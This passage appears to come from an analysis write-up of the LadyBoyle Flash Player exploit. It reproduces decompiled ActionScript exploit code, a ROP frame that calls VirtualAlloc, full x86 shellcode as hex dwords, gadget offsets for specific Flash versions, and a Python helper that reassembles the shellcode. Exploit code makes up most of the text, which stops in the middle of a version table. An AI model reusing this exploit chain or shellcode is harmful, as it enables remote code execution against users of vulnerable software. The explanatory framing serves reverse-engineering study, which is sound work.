                if (_loc_27 == "win 11,5,502,110" || _loc_27 == "win 11,5,502,135" || _loc_27 == "win 11,5,502,146")
                {
                    _loc_15 = (_loc_26 - _loc_10 - 8) / 8;
                    _loc_26 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                }
                else
                {
                    _loc_15 = (_loc_26 - 4 - _loc_10 - 8) / 8;
                    _loc_26 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[1];
                }
                _loc_17.endian = Endian.LITTLE_ENDIAN;
                // Fake frame laid out in the ByteArray at _loc_12 (ByteArray position _loc_14):
                //   +112  _loc_25, the per-version gadget the hijacked virtual call lands on; it pivots
                //         the stack onto this frame
                //   +0    _loc_26, the API address read above, followed by a call frame that matches
                //         VirtualAlloc(lpAddress = _loc_12, dwSize = 0x2000, MEM_COMMIT = 0x1000,
                //         PAGE_EXECUTE_READWRITE = 0x40) and returns into the shellcode at +136
                //   +136  the stage-1 x86 shellcode (written below)
                _loc_17.position = _loc_17.position + 112;
                _loc_17.writeUnsignedInt(_loc_25);
                _loc_17.position = _loc_17.position - 112 - 4;
                _loc_17.writeUnsignedInt(_loc_26);       // API address popped after the pivot (labelled "ROP Chain" in the original listing)
                _loc_17.writeUnsignedInt(_loc_12 + 136); // return address: the shellcode
                _loc_17.writeUnsignedInt(_loc_12);       // lpAddress
                _loc_17.writeUnsignedInt(0x2000);        // dwSize
                _loc_17.writeUnsignedInt(0x1000);        // MEM_COMMIT
                _loc_17.writeUnsignedInt(64);            // PAGE_EXECUTE_READWRITE
                _loc_17.position = _loc_17.position + 112;
                // Stage-1 x86 shellcode, first pass (163 dwords, 652 bytes). Note the first byte is 0xcc
                // (int3); the head of this block is rewritten below once the embedded payload's address and
                // length are known. As bytes: cc 90 83 ec 70 33 db 64 8b 5b 18 8b 5b 30 8b 5b 0c 8b 5b 1c =
                // int3; nop; sub esp,0x70; xor ebx,ebx; mov ebx,fs:[ebx+0x18] (TEB); mov ebx,[ebx+0x30]
                // (PEB); mov ebx,[ebx+0xc] (Ldr); mov ebx,[ebx+0x1c] (InInitializationOrderModuleList).
                // It then walks the loader list comparing the UTF-16 "kernel" built by three pushes
                // (68 65 00 6c 00 / 68 72 00 6e 00 / 68 6b 00 65 00), resolves "SetThreadContext" by name
                // and calls it on the current thread (6a fe ff d2: push -2; call edx) with a zeroed CONTEXT
                // whose ContextFlags is 0x10010 (CONTEXT_DEBUG_REGISTERS), i.e. it clears DR0-DR7.
                _loc_17.writeUnsignedInt(0xec8390cc);
                _loc_17.writeUnsignedInt(0x64db3370);
                _loc_17.writeUnsignedInt(0x8b185b8b);
                _loc_17.writeUnsignedInt(0x5b8b305b);
                _loc_17.writeUnsignedInt(0x1c5b8b0c);
                _loc_17.writeUnsignedInt(0x8b08538b);
                _loc_17.writeUnsignedInt(0x7c8b3c7a);
                _loc_17.writeUnsignedInt(0xbc8d2c3a);
                _loc_17.writeUnsignedInt(0xe0003a);
                _loc_17.writeUnsignedInt(0x408bb800);
                _loc_17.writeUnsignedInt(0x739c330);
                _loc_17.writeUnsignedInt(0xeb470374);
                _loc_17.writeUnsignedInt(0x68ef8bf9);
                _loc_17.writeUnsignedInt(0x6c0065);
                _loc_17.writeUnsignedInt(0x6e007268);
                _loc_17.writeUnsignedInt(0x6b6800);
                _loc_17.writeUnsignedInt(0x33fc0065);
                _loc_17.writeUnsignedInt(0x8b1b8bc9);
                _loc_17.writeUnsignedInt(0x207b8bf4);
                _loc_17.writeUnsignedInt(0xa7f303b1);
                _loc_17.writeUnsignedInt(0x5b8bf375);
                _loc_17.writeUnsignedInt(0x3c538b08);
                _loc_17.writeUnsignedInt(0x781a548b);
                _loc_17.writeUnsignedInt(0xec1a448d);
                _loc_17.writeUnsignedInt(0x548bd5ff);
                _loc_17.writeUnsignedInt(0xd303201a);
                _loc_17.writeUnsignedInt(0xc933c303);
                _loc_17.writeUnsignedInt(0x10e8);
                _loc_17.writeUnsignedInt(0x74655300);
                _loc_17.writeUnsignedInt(0x65726854);
                _loc_17.writeUnsignedInt(0x6f436461);
                _loc_17.writeUnsignedInt(0x7865746e);
                _loc_17.writeUnsignedInt(0x24348b74);
                _loc_17.writeUnsignedInt(0xfb033a8b);
                _loc_17.writeUnsignedInt(0xa7f304b1);
                _loc_17.writeUnsignedInt(0xc2830874);
                _loc_17.writeUnsignedInt(0x4c08304);
                _loc_17.writeUnsignedInt(0x108bebeb);
                _loc_17.writeUnsignedInt(0xc033d303);
                _loc_17.writeUnsignedInt(0x20b1c88b);
                _loc_17.writeUnsignedInt(0xabf3fc8b);
                _loc_17.writeUnsignedInt(0x102404c7);
                _loc_17.writeUnsignedInt(0x54000100);
                _loc_17.writeUnsignedInt(0xd2fffe6a);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_17.writeUnsignedInt(0xec8160);
                _loc_17.writeUnsignedInt(0x8b000004);
                _loc_17.writeUnsignedInt(0x5c47c7fc); // fc c7 47 5c imm32: cld; mov [edi+0x5c], <payload address>
                _loc_17.writeUnsignedInt(0x41414141); // placeholder, patched on the second pass
                _loc_17.writeUnsignedInt(0x5847c790); // 90 c7 47 58 imm32: nop; mov [edi+0x58], <payload length>
                _loc_17.writeUnsignedInt(0x42424242); // placeholder, patched on the second pass
                _loc_17.writeUnsignedInt(0x743207c7);
                _loc_17.writeUnsignedInt(0x47c70c91);
                _loc_17.writeUnsignedInt(0xa138e04);
                _loc_17.writeUnsignedInt(0x847c7ac);
                _loc_17.writeUnsignedInt(0x837de239);
                _loc_17.writeUnsignedInt(0x8f0c47c7);
                _loc_17.writeUnsignedInt(0xc76118f2);
                _loc_17.writeUnsignedInt(0x32931047);
                _loc_17.writeUnsignedInt(0x47c794e4);
                _loc_17.writeUnsignedInt(0x9bd55014);
                _loc_17.writeUnsignedInt(0x1847c7cb);
                _loc_17.writeUnsignedInt(0xdbacbe43);
                _loc_17.writeUnsignedInt(0xb21c47c7);
                _loc_17.writeUnsignedInt(0xc7130f36);
                _loc_17.writeUnsignedInt(0x8dc42047);
                _loc_17.writeUnsignedInt(0x47c7741f);
                _loc_17.writeUnsignedInt(0xa22f5124);
                _loc_17.writeUnsignedInt(0x2847c701);
                _loc_17.writeUnsignedInt(0xff0d6657);
                _loc_17.writeUnsignedInt(0x9b2c47c7);
                _loc_17.writeUnsignedInt(0xc7e58b87);
                _loc_17.writeUnsignedInt(0xafed3047);
                _loc_17.writeUnsignedInt(0x47c7b4ff);
                _loc_17.writeUnsignedInt(0x4b19c234);
                _loc_17.writeUnsignedInt(0x3847c701);
                _loc_17.writeUnsignedInt(0x9aa5f07d);
                _loc_17.writeUnsignedInt(0xe43c47c7);
                _loc_17.writeUnsignedInt(0xc7c5942b);
                _loc_17.writeUnsignedInt(0x9dec4047);
                _loc_17.writeUnsignedInt(0x47c7a45f);
                _loc_17.writeUnsignedInt(0x3377cc44);
                _loc_17.writeUnsignedInt(0x127e98f);
                _loc_17.writeUnsignedInt(0xc0330000);
                _loc_17.writeUnsignedInt(0x30a164);
                _loc_17.writeUnsignedInt(0x408b0000);
                _loc_17.writeUnsignedInt(0x14408b0c);
                _loc_17.writeUnsignedInt(0x8b008b);
                _loc_17.writeUnsignedInt(0x8b10408b);
                _loc_17.writeUnsignedInt(0x6af78be8);
                _loc_17.writeUnsignedInt(0xc1e85911);
                _loc_17.writeUnsignedInt(0xe2000000);
                _loc_17.writeUnsignedInt(0x81ee8bf9);
                _loc_17.writeUnsignedInt(0x400ec);
                _loc_17.writeUnsignedInt(0x89c03300);
                _loc_17.writeUnsignedInt(0x7d8b3045);
                _loc_17.writeUnsignedInt(0x815f545c);
                _loc_17.writeUnsignedInt(0x200ec);
                _loc_17.writeUnsignedInt(0x685700);
                _loc_17.writeUnsignedInt(0xff000001);
                _loc_17.writeUnsignedInt(0xc0330855);
                _loc_17.writeUnsignedInt(0x73c8040);
                _loc_17.writeUnsignedInt(0x89f97500);
                _loc_17.writeUnsignedInt(0x4c76045);
                _loc_17.writeUnsignedInt(0x63626107);
                _loc_17.writeUnsignedInt(0x744c72e);
                _loc_17.writeUnsignedInt(0x67666304);
                _loc_17.writeUnsignedInt(0x6a006a00);
                _loc_17.writeUnsignedInt(0x6a026a00);
                _loc_17.writeUnsignedInt(0x68006a00);
                _loc_17.writeUnsignedInt(0x40000000);
                _loc_17.writeUnsignedInt(0x10458b57);
                _loc_17.writeUnsignedInt(0x49e8);
                _loc_17.writeUnsignedInt(0xf88300);
                _loc_17.writeUnsignedInt(0x4589327e);
                _loc_17.writeUnsignedInt(0x4045c734);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(0x458d006a);
                _loc_17.writeUnsignedInt(0x75ff5044);
                _loc_17.writeUnsignedInt(0x5c75ff58);
                _loc_17.writeUnsignedInt(0xff3475ff);
                _loc_17.writeUnsignedInt(0x75ff2055);
                _loc_17.writeUnsignedInt(0x2855ff34);
                _loc_17.writeUnsignedInt(0x2045c757);
                _loc_17.writeUnsignedInt(0x41780963);
                _loc_17.writeUnsignedInt(0xe800458b);
                _loc_17.writeUnsignedInt(18);
                _loc_17.writeUnsignedInt(0x7c4c481);
                _loc_17.writeUnsignedInt(0x8d610000);
                _loc_17.writeUnsignedInt(0x6ac3d465);
                _loc_17.writeUnsignedInt(0xffff6aff);
                _loc_17.writeUnsignedInt(0x38800c55);
                _loc_17.writeUnsignedInt(0x800a74e8);
                _loc_17.writeUnsignedInt(0x574e938);
                _loc_17.writeUnsignedInt(0x75eb3880);
                _loc_17.writeUnsignedInt(0x5788111);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_17.writeUnsignedInt(0xff8b0874);
                _loc_17.writeUnsignedInt(0x8dec8b55);
                _loc_17.writeUnsignedInt(0xe0ff0540);
                _loc_17.writeUnsignedInt(0x758b5651);
                _loc_17.writeUnsignedInt(0x2e748b3c);
                _loc_17.writeUnsignedInt(0x56f50378);
                _loc_17.writeUnsignedInt(0x320768b);
                _loc_17.writeUnsignedInt(0x49c933f5);
                _loc_17.writeUnsignedInt(0xc503ad41);
                _loc_17.writeUnsignedInt(0xbe0fdb33);
                _loc_17.writeUnsignedInt(0x74d63a10);
                _loc_17.writeUnsignedInt(0x7cbc108);
                _loc_17.writeUnsignedInt(0xeb40da03);
                _loc_17.writeUnsignedInt(0x751f3bf1);
                _loc_17.writeUnsignedInt(0x5e8b5ee7);
                _loc_17.writeUnsignedInt(0x66dd0324);
                _loc_17.writeUnsignedInt(0x8b4b0c8b);
                _loc_17.writeUnsignedInt(0xdd031c5e);
                _loc_17.writeUnsignedInt(0x38b048b);
                _loc_17.writeUnsignedInt(0x595eabc5);
                _loc_17.writeUnsignedInt(0xfed4e8c3);
                _loc_17.writeUnsignedInt(0x9090ffff);
                _loc_17.writeUnsignedInt(0x90909090);
                // Persist a timestamp in _loc_18 (a SharedObject, judging by data/flush/close), then append
                // the embedded x86 payload (the_x32_Class, a binary asset) right after the shellcode.
                _loc_18.data.now = new Date().time;
                _loc_18.flush();
                _loc_18.close();
                _loc_28 = new this.the_x32_Class();
                _loc_17.writeBytes(_loc_28, 0, _loc_28.length);
                // Second pass. writeBytes() may have reallocated the ByteArray's buffer, so the data pointer is
                // re-read through the same two dereferences (object +64 -> buffer object +8 -> data) and the
                // frame is rebuilt at the remembered position _loc_14.
                _loc_12 = _loc_13;
                _loc_15 = (_loc_12 + 64 - _loc_10 - 8) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_15 = (_loc_12 + 8 - _loc_10 - 8) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_12 = _loc_12 + _loc_14;
                _loc_17.position = _loc_14 + 112;
                _loc_17.writeUnsignedInt(_loc_25);
                _loc_17.position = _loc_17.position - 112 - 4;
                _loc_17.writeUnsignedInt(_loc_26);
                _loc_17.writeUnsignedInt(_loc_12 + 136);
                _loc_17.writeUnsignedInt(_loc_12);
                _loc_17.writeUnsignedInt(0x2000);
                _loc_17.writeUnsignedInt(0x1000);
                _loc_17.writeUnsignedInt(64);
                _loc_17.position = _loc_17.position + 112;
                // Rewrite of the first 54 dwords of the shellcode: 90 60 83 ec 70 = nop; pushad; sub esp,0x70
                // replaces the int3 of the first pass; the rest of the block is identical except for the
                // frame size and the two placeholders patched below.
                _loc_17.writeUnsignedInt(0xec836090);
                _loc_17.writeUnsignedInt(0x64db3370);
                _loc_17.writeUnsignedInt(0x8b185b8b);
                _loc_17.writeUnsignedInt(0x5b8b305b);
                _loc_17.writeUnsignedInt(0x1c5b8b0c);
                _loc_17.writeUnsignedInt(0x8b08538b);
                _loc_17.writeUnsignedInt(0x7c8b3c7a);
                _loc_17.writeUnsignedInt(0xbc8d2c3a);
                _loc_17.writeUnsignedInt(0xe0003a);
                _loc_17.writeUnsignedInt(0x408bb800);
                _loc_17.writeUnsignedInt(0x739c330);
                _loc_17.writeUnsignedInt(0xeb470374);
                _loc_17.writeUnsignedInt(0x68ef8bf9);
                _loc_17.writeUnsignedInt(0x6c0065);
                _loc_17.writeUnsignedInt(0x6e007268);
                _loc_17.writeUnsignedInt(0x6b6800);
                _loc_17.writeUnsignedInt(0x33fc0065);
                _loc_17.writeUnsignedInt(0x8b1b8bc9);
                _loc_17.writeUnsignedInt(0x207b8bf4);
                _loc_17.writeUnsignedInt(0xa7f303b1);
                _loc_17.writeUnsignedInt(0x5b8bf375);
                _loc_17.writeUnsignedInt(0x3c538b08);
                _loc_17.writeUnsignedInt(0x781a548b);
                _loc_17.writeUnsignedInt(0xec1a448d);
                _loc_17.writeUnsignedInt(0x548bd5ff);
                _loc_17.writeUnsignedInt(0xd303201a);
                _loc_17.writeUnsignedInt(0xc933c303);
                _loc_17.writeUnsignedInt(0x10e8);
                _loc_17.writeUnsignedInt(0x74655300);
                _loc_17.writeUnsignedInt(0x65726854);
                _loc_17.writeUnsignedInt(0x6f436461);
                _loc_17.writeUnsignedInt(0x7865746e);
                _loc_17.writeUnsignedInt(0x24348b74);
                _loc_17.writeUnsignedInt(0xfb033a8b);
                _loc_17.writeUnsignedInt(0xa7f304b1);
                _loc_17.writeUnsignedInt(0xc2830874);
                _loc_17.writeUnsignedInt(0x4c08304);
                _loc_17.writeUnsignedInt(0x108bebeb);
                _loc_17.writeUnsignedInt(0xc033d303);
                _loc_17.writeUnsignedInt(0x20b1c88b);
                _loc_17.writeUnsignedInt(0xabf3fc8b);
                _loc_17.writeUnsignedInt(0x102404c7);
                _loc_17.writeUnsignedInt(0x54000100);
                _loc_17.writeUnsignedInt(0xd2fffe6a);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_17.writeUnsignedInt(0x20ec8160); // 60 81 ec 20 01 00 00: pushad; sub esp,0x120 (the first pass had 0x400 here)
                _loc_17.writeUnsignedInt(0x8b000001);
                _loc_17.writeUnsignedInt(0x5c47c7fc); // mov [edi+0x5c], <payload address>
                _loc_17.writeUnsignedInt(_loc_12 + 616 + 176 - 4); // = _loc_12 + 788: where writeBytes(_loc_28) put the payload (136 + 163 * 4 bytes of shellcode)
                _loc_17.writeUnsignedInt(0x5847c790); // mov [edi+0x58], <payload length>
                _loc_17.writeUnsignedInt(_loc_28.length);
                // Trigger. Point the first dword of the object at _loc_11 at the fake frame (_loc_12), then force
                // a native virtual call through it by calling toString() on the Sound object _loc_6; the hijacked
                // slot holds _loc_25, which pivots into the API frame at +0 and from there into the shellcode.
                // Afterwards the original pointer (_loc_16) is put back and the vector header is restored via the
                // wrapping index 0x1fffffff (the sample writes it twice) so the player survives.
                _loc_15 = (_loc_11 - _loc_10 - 8) / 8;
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[_loc_15] = this.UintToDouble(_loc_12, this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[1]);
                new Number(_loc_6.toString());
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[_loc_15] = this.UintToDouble(_loc_16, this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[1]);
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
                return;
            }
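Before the 64-bit branch, a small helper for reading the listing above. It is added for this write-up and is not part of the LadyBoyle sample or the original post. It packs the writeUnsignedInt() arguments the way a ByteArray stores them after endian = LITTLE_ENDIAN and pulls out the facts the comments rely on: the API name embedded as text, the UTF-16 module name assembled from a run of push instructions, the byte offsets of the two placeholder immediates, and the 788-byte payload offset (136 + 652) that the second pass patches in as 616 + 176 - 4. It also models the index arithmetic the listing uses to reach an absolute address through a Vector.<Number>, including the 0x1fffffff wrap onto the header. The dword table is copied from the first-pass shellcode above; the function names, the constants and the vector base used in the demonstration are mine.

```python
import re
import struct

# The 163 writeUnsignedInt() arguments of the first-pass x86 stage, copied from the
# listing above (from 0xec8390cc up to the 0x90909090 that precedes writeBytes()).
STAGE1_DWORDS = [
    0xec8390cc, 0x64db3370, 0x8b185b8b, 0x5b8b305b, 0x1c5b8b0c, 0x8b08538b, 0x7c8b3c7a, 0xbc8d2c3a,
    0x00e0003a, 0x408bb800, 0x0739c330, 0xeb470374, 0x68ef8bf9, 0x006c0065, 0x6e007268, 0x006b6800,
    0x33fc0065, 0x8b1b8bc9, 0x207b8bf4, 0xa7f303b1, 0x5b8bf375, 0x3c538b08, 0x781a548b, 0xec1a448d,
    0x548bd5ff, 0xd303201a, 0xc933c303, 0x000010e8, 0x74655300, 0x65726854, 0x6f436461, 0x7865746e,
    0x24348b74, 0xfb033a8b, 0xa7f304b1, 0xc2830874, 0x04c08304, 0x108bebeb, 0xc033d303, 0x20b1c88b,
    0xabf3fc8b, 0x102404c7, 0x54000100, 0xd2fffe6a, 0x90909090, 0x90909090, 0x90909090, 0x90909090,
    0x00ec8160, 0x8b000004, 0x5c47c7fc, 0x41414141, 0x5847c790, 0x42424242, 0x743207c7, 0x47c70c91,
    0x0a138e04, 0x0847c7ac, 0x837de239, 0x8f0c47c7, 0xc76118f2, 0x32931047, 0x47c794e4, 0x9bd55014,
    0x1847c7cb, 0xdbacbe43, 0xb21c47c7, 0xc7130f36, 0x8dc42047, 0x47c7741f, 0xa22f5124, 0x2847c701,
    0xff0d6657, 0x9b2c47c7, 0xc7e58b87, 0xafed3047, 0x47c7b4ff, 0x4b19c234, 0x3847c701, 0x9aa5f07d,
    0xe43c47c7, 0xc7c5942b, 0x9dec4047, 0x47c7a45f, 0x3377cc44, 0x0127e98f, 0xc0330000, 0x0030a164,
    0x408b0000, 0x14408b0c, 0x008b008b, 0x8b10408b, 0x6af78be8, 0xc1e85911, 0xe2000000, 0x81ee8bf9,
    0x000400ec, 0x89c03300, 0x7d8b3045, 0x815f545c, 0x000200ec, 0x00685700, 0xff000001, 0xc0330855,
    0x073c8040, 0x89f97500, 0x04c76045, 0x63626107, 0x0744c72e, 0x67666304, 0x6a006a00, 0x6a026a00,
    0x68006a00, 0x40000000, 0x10458b57, 0x000049e8, 0x00f88300, 0x4589327e, 0x4045c734, 0x00000000,
    0x458d006a, 0x75ff5044, 0x5c75ff58, 0xff3475ff, 0x75ff2055, 0x2855ff34, 0x2045c757, 0x41780963,
    0xe800458b, 0x00000012, 0x07c4c481, 0x8d610000, 0x6ac3d465, 0xffff6aff, 0x38800c55, 0x800a74e8,
    0x0574e938, 0x75eb3880, 0x05788111, 0x90909090, 0xff8b0874, 0x8dec8b55, 0xe0ff0540, 0x758b5651,
    0x2e748b3c, 0x56f50378, 0x0320768b, 0x49c933f5, 0xc503ad41, 0xbe0fdb33, 0x74d63a10, 0x07cbc108,
    0xeb40da03, 0x751f3bf1, 0x5e8b5ee7, 0x66dd0324, 0x8b4b0c8b, 0xdd031c5e, 0x038b048b, 0x595eabc5,
    0xfed4e8c3, 0x9090ffff, 0x90909090,
]

SHELLCODE_OFFSET = 136                  # the frame's return address is _loc_12 + 136
PATCHED_PAYLOAD_OFFSET = 616 + 176 - 4  # value the second pass stores in [edi+0x5c]


def dwords_to_bytes(dwords):
    """Pack the values as a ByteArray does after endian = LITTLE_ENDIAN."""
    return b"".join(struct.pack("<I", d & 0xFFFFFFFF) for d in dwords)


def ascii_strings(blob, min_len=4):
    """Printable runs embedded directly in the code (e.g. the API name)."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def pushed_strings(blob, min_pushes=2):
    """Strings built from runs of `push imm32` (opcode 0x68). The stack grows down,
    so the immediates are joined in reverse order, then decoded as UTF-16LE, which is
    how the loader list stores module names."""
    out = []
    for m in re.finditer(rb"(?:\x68[\x00-\xff]{4}){%d,}" % min_pushes, blob):
        run = m.group()
        imms = [run[i + 1:i + 5] for i in range(0, len(run), 5)]
        out.append(b"".join(reversed(imms)).decode("utf-16-le", "replace").rstrip("\x00"))
    return out


def placeholder_offsets(blob):
    """Byte offsets of the two immediates the second pass overwrites."""
    return {"payload_addr": blob.find(struct.pack("<I", 0x41414141)),
            "payload_len": blob.find(struct.pack("<I", 0x42424242))}


def payload_offset(blob):
    """Where writeBytes(_loc_28) lands relative to _loc_12: right after the shellcode."""
    return SHELLCODE_OFFSET + len(blob)


def vec_index(addr, base, header=8):
    """Index the listing hands to ReadDouble() to reach absolute address `addr` through a
    Vector.<Number> allocated at `base` (header is 8 bytes on x86, 16 on x64)."""
    return (addr - base - header) // 8


def vec_addr(index, base, header=8, bits=32):
    """Address element `index` really maps to, with pointer arithmetic wrapping at `bits`."""
    return (base + header + 8 * index) & ((1 << bits) - 1)


if __name__ == "__main__":
    sc = dwords_to_bytes(STAGE1_DWORDS)
    print(len(sc), hex(sc[0]), ascii_strings(sc), pushed_strings(sc))
    print(placeholder_offsets(sc), payload_offset(sc) == PATCHED_PAYLOAD_OFFSET)
    base = 0x0A100000  # hypothetical vector address, only for the wrap demonstration
    print(hex(vec_addr(0x1FFFFFFF, base)), hex(base))
```

Feeding the bytes to a disassembler is the natural next step; the helper only confirms what can be read off the listing without one, and the same functions apply unchanged to the x64 dword list further down.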
            // 64-bit player path (x64 layout: 16-byte vector header, 144-byte stride per 16-element vector,
            // 8-byte pointers handled as low/high dword pairs). Element 16 of a 16-element vector is the next
            // allocation's header, so reading 16 there means another 16-element Vector.<Number> sits right after
            // this one; its length is then set to 0xffffffff and its first element marked so it can be found.
            if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 16)[0] == 16)
            {
                _loc_31 = 0;
                _loc_31 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[1]; // neighbour's second header qword, saved (high dword)
                _loc_9 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[0];  // ... and its low dword
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[16] = this.UintToDouble(0xffffffff, 0); // neighbour's length := 0xffffffff
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[18] = this.UintToDouble(0x41414141, 0); // marker in neighbour[0]
                _loc_32 = _loc_7;
                _loc_33 = _loc_22;
                _loc_21 = false;
                // Find which sprayed vector received the marker: that one now has length 0xffffffff and is the
                // read/write primitive from here on.
                _loc_1 = 0;
                while (_loc_1 < 0x4000)
                {
                    
                    if (_loc_21)
                    {
                        break;
                    }
                    _loc_8 = 1;
                    while (_loc_8 <= 8)
                    {
                        
                        try
                        {
                            if (this.ReadDouble(_loc_5[_loc_1][_loc_8] as Vector.<Number>, 0)[0] == 0x41414141)
                            {
                                _loc_7 = _loc_1;
                                _loc_22 = _loc_8;
                                _loc_21 = true;
                                break;
                            }
                        }
                        catch (e:Error)
                        {
                        }
                        _loc_8 = _loc_8 + 1;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                // On any failure from here on the sample hangs in an empty loop rather than crash the host.
                if (!_loc_21)
                {
                    while (1)
                    {
                        
                    }
                }
                // Scan the enlarged vector for the pattern 32, 1 followed by two tagged pointers (low 3 bits
                // masked off): _loc_11 becomes the object whose first qword is hijacked, _loc_12/_loc_13 the
                // object through which the ByteArray's data buffer is reached (+128 -> buffer object +16 -> data).
                _loc_1 = 0;
                while (_loc_1 < 0x1000)
                {
                    
                    if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1)[0] == 32 && this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, (_loc_1 + 1))[0] == 1)
                    {
                        _loc_11 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 2)[0] & 0xfffffff8;
                        _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 3)[0] & 0xfffffff8;
                        _loc_13 = _loc_12;
                        break;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                if (_loc_1 == 0x1000)
                {
                    while (1)
                    {
                        
                    }
                }
                if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 2)[1] != _loc_31 || this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 3)[1] != _loc_31)
                {
                    while (1)
                    {
                        
                    }
                }
                // Release every sprayed vector except the enlarged one and the one that was written through.
                _loc_1 = 0;
                while (_loc_1 < 0x4000)
                {
                    
                    _loc_8 = 1;
                    while (_loc_8 <= 8)
                    {
                        
                        if (!(_loc_1 == _loc_7 && _loc_8 == _loc_22) && !(_loc_1 == _loc_32 && _loc_8 == _loc_33))
                        {
                            _loc_5[_loc_1][_loc_8] = null;
                        }
                        _loc_8 = _loc_8 + 1;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                // Recover the enlarged vector's own base address _loc_10 from a pointer found in the headers of
                // the vectors allocated after it (144 bytes apart); two consecutive neighbours must agree to
                // avoid a false hit.
                _loc_1 = 1;
                while (_loc_1 < 4)
                {
                    
                    _loc_29 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 16 * _loc_1 + 2 * (_loc_1 - 1));
                    _loc_30 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 16 * (_loc_1 + 1) + 2 * ((_loc_1 + 1) - 1));
                    if (_loc_29[1] < _loc_29[0] && _loc_30[1] < _loc_30[0] && _loc_30[0] - _loc_29[0] == 144)
                    {
                        _loc_10 = _loc_29[0] - 144 * (_loc_1 + 1);
                        break;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                if (_loc_10 == 0)
                {
                    while (1)
                    {
                        
                    }
                }
                // Write 102400 dwords (400 KB) of 0x41414141 into the ByteArray before the chain, so the frame,
                // chain and shellcode end up in a large, freshly sized buffer.
                _loc_1 = 0;
                while (_loc_1 < 1024 * 100)
                {
                    
                    _loc_17.writeUnsignedInt(0x41414141);
                    _loc_1 = _loc_1 + 1;
                }
                // Same two dereferences as the 32-bit path, with the x64 field offsets (+128, +16) and the
                // 16-byte vector header; _loc_16 is again the first qword (low dword) of the object at _loc_11.
                _loc_15 = (_loc_12 + 128 - _loc_10 - 16) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_15 = (_loc_12 + 16 - _loc_10 - 16) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_12 = _loc_12 + _loc_17.position;
                _loc_14 = _loc_17.position;
                _loc_15 = (_loc_11 - _loc_10 - 16) / 8;
                _loc_16 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_25 = 0;
                _loc_26 = 0;
                _loc_27 = Capabilities.version.toLowerCase();
                switch(_loc_27)
                {
                    case "win 11,5,502,146":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x8a6d21;
                            _loc_26 = _loc_16 - 0x8ab096;
                            _loc_36 = _loc_16 - 0x8a41dd;
                            _loc_37 = _loc_16 - 0x75f9c0;
                            _loc_38 = _loc_16 - 0xa9377c;
                            _loc_39 = _loc_16 - 0x902ea7;
                            _loc_40 = _loc_16 - 0xa98908;
                        }
                        break;
                    }
                    case "win 11,5,502,135":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x8dca4a;
                            _loc_26 = _loc_16 - 0x8aaf16;
                            _loc_36 = _loc_16 - 0x8805fa;
                            _loc_37 = _loc_16 - 0x75fae0;
                            _loc_38 = _loc_16 - 0x971f1a;
                            _loc_39 = _loc_16 - 0x902d3f;
                            _loc_40 = _loc_16 - 0x2f6a71;
                        }
                        break;
                    }
                    case "win 11,5,502,110":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x8a6cf5;
                            _loc_26 = _loc_16 - 0x8ab046;
                            _loc_36 = _loc_16 - 0x88077a;
                            _loc_37 = _loc_16 - 0x90b8de;
                            _loc_38 = _loc_16 - 0xa9374c;
                            _loc_39 = _loc_16 - 0x902e5b;
                            _loc_40 = _loc_16 - 0x270bff;
                        }
                        break;
                    }
                    case "win 11,4,402,287":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
